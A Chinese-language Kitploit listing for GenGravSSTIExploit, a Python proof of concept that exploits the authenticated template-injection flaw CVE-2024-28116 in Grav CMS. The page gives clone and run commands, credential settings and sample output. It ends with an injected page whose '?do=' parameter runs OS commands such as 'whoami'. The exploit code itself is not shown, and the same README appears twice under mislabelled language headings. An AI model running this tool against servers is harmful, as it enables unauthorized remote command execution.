Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
GenGravSSTIExploit — 是一个 PoC Python 脚本,用于利用 Grav CMS 版本 <= 1.7.44(CVE-2024-28116)中经过身份验证的服务端模板注入(SSTI)漏洞。 | Kitploit
工具/GitHubGitHub/geniuszly/gengravsstiexploit
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用学习与教育
GitHubgeniuszly/gengravsstiexploit

GenGravSSTIExploit

是一个 PoC Python 脚本,用于利用 Grav CMS 版本 <= 1.7.44(CVE-2024-28116)中经过身份验证的服务端模板注入(SSTI)漏洞。

查看仓库
721年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

英文

GenGravSSTIExploit 是一个 PoC Python 脚本,利用 Grav CMS 版本 <= 1.7.44(CVE-2024-28116)中一个已认证的服务端模板注入(SSTI)漏洞。该漏洞允许具有编辑者权限的用户在远程服务器上执行操作系统命令。

注意:此脚本需要有效的凭据才能登录 Grav CMS 控制台。

功能

  • 使用编辑者凭据对 Grav CMS 管理面板进行身份验证。
  • 在 CMS 上创建一个新页面以注入载荷。
  • 利用 SSTI 漏洞远程执行操作系统命令。

要求

  • Python 3.x
  • requests 库(通过 pip install requests 安装)

使用方法

  1. 克隆仓库

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
  2. 配置凭据

    编辑脚本以提供你的 Grav CMS 编辑者凭据:

    root@kitploit:~
    GRAV_USER = "youruser"
    GRAV_PASSWORD = "yourpassword"
    
  3. 运行脚本

    使用以下命令运行脚本:

    root@kitploit:~
    python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
    
    • <TARGET_URL>:目标 URL,格式为 http[s]://hostname。
    • <PORT>:端口号(默认为 80)。

    示例:

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  4. 与 Exploit 交互

    如果利用成功,你会获得一个可以执行操作系统命令的 URL:

    root@kitploit:~
    [+] RCE payload injected. Visit the malicious page: http://example.com:8080/poc_<ID>?do=<command>
    

示例输出

root@kitploit:~
  python GenGravSSTIExploit.py -t http://example.com -p 8080

脚本将逐步执行,并通过终端向你提供更新。你可能会看到以下内容:

root@kitploit:~
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>

脚本运行完成后,你会看到一条包含注入页面链接的消息。你可以访问此链接来执行操作系统命令:

root@kitploit:~
http://example.com:8080/poc_4T7B?do=whoami

使用指定命令访问该 URL 将直接在页面上显示输出:

root@kitploit:~
Cmd-Output:
root

免责声明

此工具仅用于教育目的。请负责任地使用,并仅在你拥有明确许可的系统上使用。作者对因使用此脚本造成的任何滥用或损害不承担责任。

俄文

GenGravSSTIExploit 是一个 PoC Python 脚本,利用 Grav CMS 版本 <= 1.7.44(CVE-2024-28116)中一个已认证的 SSTI(服务端模板注入)漏洞。该漏洞允许具有编辑者权限的用户在远程服务器上执行操作系统命令。

注意:脚本需要有效的凭据才能在 Grav CMS 管理面板中授权。

功能

  • 使用编辑者凭据对 Grav CMS 管理面板进行身份验证。
  • 在 CMS 上创建一个新页面以注入载荷。
  • 利用 SSTI 漏洞远程执行操作系统命令。

要求

  • Python 3.x
  • requests 库(通过 pip install requests 安装)

使用方法

  1. 克隆仓库

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
  2. 配置凭据

    编辑脚本并输入 Grav CMS 编辑者凭据:

    root@kitploit:~
    GRAV_USER = "youruser"
    GRAV_PASSWORD = "yourpassword"
    
  3. 运行脚本

    使用以下命令运行脚本:

    root@kitploit:~
    python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
    
    • <TARGET_URL>:目标 URL,格式为 http[s]://hostname。
    • <PORT>:端口号(默认为 80)。

    示例:

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  4. 与 Exploit 交互

    如果利用成功,你会获得一个可以执行操作系统命令的 URL:

    root@kitploit:~
    [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_<ID>?do=<command>
    

示例输出

root@kitploit:~
  python GenGravSSTIExploit.py -t http://example.com -p 8080

脚本将逐步执行,并通过终端向你提供更新。你可能会看到以下内容:

root@kitploit:~
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>

脚本运行完成后,你会看到一条包含注入页面链接的消息。你可以访问此链接来执行操作系统命令:

root@kitploit:~
http://example.com:8080/poc_4T7B?do=whoami

使用指定命令访问该 URL 将直接在页面上显示输出:

root@kitploit:~
Cmd-Output:
root

免责声明

此工具仅用于教育目的。请负责任地使用,并仅在你拥有明确许可的系统上使用。作者对因使用此脚本造成的任何滥用或损害不承担责任。

下载工具